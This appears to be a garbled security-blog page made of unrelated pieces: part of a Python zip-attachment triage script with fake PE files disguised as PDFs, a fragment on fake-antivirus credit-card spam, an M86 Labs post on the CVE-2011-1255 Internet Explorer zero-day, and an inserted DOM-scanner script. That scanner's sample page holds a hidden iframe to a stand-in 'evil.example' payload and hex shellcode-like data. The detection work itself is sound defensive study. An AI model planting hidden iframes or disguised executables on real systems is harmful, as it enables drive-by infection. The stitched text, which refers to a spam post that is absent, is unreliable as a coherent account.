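    """Constructed attachment: a 'form' that is really a PE, the same PE under a .pdf name,
    a double-extension name, and a harmless text file."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("Refund-Form.exe", PE_MAGIC + b"\x90" * 62 + b"fake-pe-for-demo")
        z.writestr("Refund-Form.pdf", PE_MAGIC + b"\x90" * 62)
        z.writestr("Statement.pdf.exe", PE_MAGIC + b"\x90" * 62)
        z.writestr("readme.txt", b"Please see the attached form.\n")
    return buf.getvalue()


def triage_attachment(data):
    """Return [(member_name, [reasons])] for archive members that look executable."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as z:
        for info in z.infolist():
            if info.is_dir():
                continue
            name = info.filename.lower()
            reasons = []
            if name.endswith(EXEC_EXT):
                reasons.append("executable extension")
                if name.count(".") > 1:
                    reasons.append("double extension")
            if info.file_size <= MAX_ENTRY:
                with z.open(info) as fh:
                    head = fh.read(len(PE_MAGIC))   # only the first bytes are inflated
                if head == PE_MAGIC:
                    reasons.append("PE header (MZ) regardless of extension")
            else:
                reasons.append("member too large to inspect")
            if reasons:
                findings.append((info.filename, reasons))
    return findings


if __name__ == "__main__":
    for member, reasons in triage_attachment(build_sample_zip()):
        print(f"{member}: " + "; ".join(reasons))
```

The content check is the one that matters: a PE renamed to .pdf passes an extension filter and still runs if the victim is tricked into launching it, so the gateway should block on the MZ header, not on the name.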


The fake AV pops up a fake warning.

Fake AV system utility

Spammers are constantly inventing new social engineering themes in an effort to distribute their malware. Targeting credit card holders, especially in this tough economy, is just another theme in their portfolio. The spammers can change their themes over time, and often just recycle old ones. There is enough in this message to cause most people to be suspicious, especially the fact that your credit card company is unlikely to be emailing you in the first place.  So, as usual, be wary.


0-day exploit used in a targeted attack – CVE-2011-1255

By Avri Schneider  •  June 26th, 2011  •   Cybercrime Malware Vulnerabilities

Time Element Memory Corruption, a remote code execution vulnerability in Internet Explorer that Microsoft recently patched as part of MS11-050 and that carries the Common Vulnerabilities and Exposures (CVE) number CVE-2011-1255, is being actively exploited in the wild.

The M86 Security Labs team was asked to inspect the URL of a legitimate website belonging to a large private company, which had been blocked by one of the proactive detection rules implemented in our Secure Web Gateway product.

We were asked to investigate if it was indeed a malicious page or a case of Over-Blocking.

The page looked benign, but on inspecting each included JavaScript file we saw that one of them was injecting an iframe pointing to a malicious page, and that page was easily classified as malicious because shellcode patterns were stored as part of the page's DOM (screenshots of the injected script and the shellcode appeared in the original post).

So, just another infected site, big deal, right? But on further inspection we saw that it exploited an unpublished security vulnerability in Internet Explorer. To verify this, we opened the malicious page in the latest fully patched version of IE and saw a crash followed by execution of the malicious code.

You can imagine the excitement on the team – finding a 0-day in the wild!

The excitement of finding a 0-day in the wild didn’t last that long, since soon after, Microsoft released details about this particular vulnerability.

Based on data we have reviewed from various sources, we can say with a high level of certainty that the anonymous researcher who, according to Microsoft's security advisory, reported the vulnerability details to VeriSign iDefense, or at least one of his acquaintances, used those details for malicious purposes as part of targeted attacks.

We decided that we should inspect the shellcode to see what the attacker was after. It used various anti-debugging tricks, but after decoding, it revealed a clear-text URL pointing to a malicious server already listed in our repository.

The attack sample stored in our repository was an attack for the well-known iepeers.dll vulnerability exploiting CVE-2010-0806.

It is interesting to note that the first saved sample of that attack is dated 21 March 2010, while the vulnerability was publicly detailed and patched by Microsoft's MS10-018 security update for Internet Explorer on 30 March 2010.

Two 0-day exploits served from the same server – impressive!

We wanted to find out where else he is serving his malicious code.

Remember the code snippet shown above, showing how the attacker hid the shellcode as part of the DOM?

Hiding data in the DOM of the page is a good obfuscation technique that bypasses security software that doesn’t act as an actual browser, and where their script engine does not have access to the actual DOM.

It turns out that one of the side-effects of hiding data inside DIV elements is that it makes the data indexable by search engines.
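The two tricks described on this page, the hidden iframe that pulls in the Blackhole landing page in the Facebook spam post above and the shellcode parked in DIV elements here, are both visible to a scanner that actually parses the page rather than only its scripts. The following is an added example (not code from either post or from the Secure Web Gateway) that walks the HTML with the standard-library parser and reports iframes that are hidden or sized to be invisible, and text nodes that are long runs of hex or %u escapes, together with the element they sit in. The HTML is a constructed sample; the length thresholds are assumptions, and no attempt is made to reverse the attacker's custom delimiters, which are not documented on this page.

```python
import re
from html.parser import HTMLParser

HEX_RUN_RE = re.compile(r"[0-9a-fA-F]{400,}")                 # assumption: 200+ bytes of hex in one node
UNICODE_ESCAPE_RE = re.compile(r"(?:%u[0-9a-fA-F]{4}){50,}")   # classic %uXXXX shellcode encoding


class DomScanner(HTMLParser):
    """Collects (a) iframes that are hidden or invisibly small and (b) text nodes that
    look like encoded shellcode, recording the enclosing element for each."""

    def __init__(self):
        super().__init__()
        self.hidden_iframes = []
        self.hex_blobs = []
        self._stack = []

    @staticmethod
    def _dim(value):
        if value is None:
            return 10 ** 9
        m = re.match(r"\d+", value.strip())
        return int(m.group()) if m else 10 ** 9

    def handle_starttag(self, tag, attrs):
        self._stack.append(tag)
        if tag == "iframe":
            a = dict(attrs)
            style = (a.get("style") or "").replace(" ", "").lower()
            tiny = any(self._dim(a.get(k)) <= 1 for k in ("width", "height"))
            if tiny or "display:none" in style or "visibility:hidden" in style:
                self.hidden_iframes.append(a.get("src"))

    def handle_endtag(self, tag):
        if self._stack and self._stack[-1] == tag:
            self._stack.pop()

    def handle_data(self, data):
        compact = re.sub(r"\s+", "", data)
        if HEX_RUN_RE.search(compact) or UNICODE_ESCAPE_RE.search(compact):
            self.hex_blobs.append((self._stack[-1] if self._stack else None, len(compact)))


def scan_html(html):
    s = DomScanner()
    s.feed(html)
    s.close()
    return {"hidden_iframes": s.hidden_iframes, "hex_blobs": s.hex_blobs}


def hex_run_bytes(text):
    """Longest hex run in a text node, decoded to bytes, ready for a disassembler."""
    runs = re.findall(r"[0-9a-fA-F]+", re.sub(r"\s+", "", text))
    best = max(runs, key=len, default="")
    return bytes.fromhex(best[: len(best) - len(best) % 2])


# Constructed page: one invisible iframe, one ordinary one, and a DIV holding hex data.
SAMPLE_HTML = """<html><body>
<p>Welcome to our company site. Our reference number is 0x1234.</p>
<iframe src="http://evil.example/payload.html" width="1" height="1" style="visibility: hidden"></iframe>
<iframe src="http://partner.example/widget" width="300" height="200"></iframe>
<div id="stage">""" + "e8000000005b83c310" * 40 + """</div>
</body></html>"""

if __name__ == "__main__":
    print(scan_html(SAMPLE_HTML))
```

Because the scanner looks at rendered text rather than script source, it sees the DIV payload the same way a search engine does, which is the observation the post turns against the attacker below.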

Google searching the pattern “TTu0d0f[...snip...]d0dLL1043416UU” revealed about 16 results and as of this writing, only a few were still alive.

Here is the list of the infected sites according to Google’s search result:

Not only does Google cache samples for us; it is also ironic that an attacker's obfuscation technique can be turned against him to find his infection servers with a simple Google search. :)